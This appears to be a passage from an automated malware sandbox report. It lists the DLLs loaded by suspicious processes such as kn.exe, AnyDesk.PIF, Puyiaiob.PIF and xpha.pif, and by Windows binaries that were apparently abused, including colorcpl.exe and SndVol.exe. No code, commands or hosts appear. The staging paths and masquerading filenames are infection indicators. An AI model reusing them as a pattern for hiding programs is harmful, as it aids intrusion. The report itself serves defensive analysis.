Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptui.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: certca.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\kn.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: learning_tools.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ???.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ????.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: ??l.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: tquery.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: advapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: spp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: winscard.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\AnyDesk.PIF	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\esentutl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: colorui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mscms.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coloradapterclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sti.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\xpha.pif	Section loaded: iphlpapi.dll
Source: C:\Users\Public\xpha.pif	Section loaded: winnsi.dll
Source: C:\Users\Public\xpha.pif	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: apphelp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: learning_tools.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mswsock.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: iphlpapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winnsi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: smartscreenps.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???e???????????.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??????????.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ???.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ????.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ??l.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: tquery.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: cryptdll.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: mssip32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: endpointdlp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: advapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: spp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vssapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: vsstrace.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppwmi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: slc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppcext.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winscard.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: devobj.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: cryptsp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: rsaenh.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: cryptbase.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: msasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: dwmapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: atlthunk.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: mmdevapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: devobj.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: textshaping.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: winmm.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: ntasn1.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: version.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: uxtheme.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: url.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieframe.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: iertutil.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: netapi32.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: userenv.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winhttp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: wkscli.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: netutils.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: amsi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: learning_tools.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: winmm.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: wininet.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: sspicli.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: windows.storage.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: wldp.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: profapi.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieproxy.dll
Source: C:\Users\Public\Libraries\Puyiaiob.PIF	Section loaded: ieproxy.dll
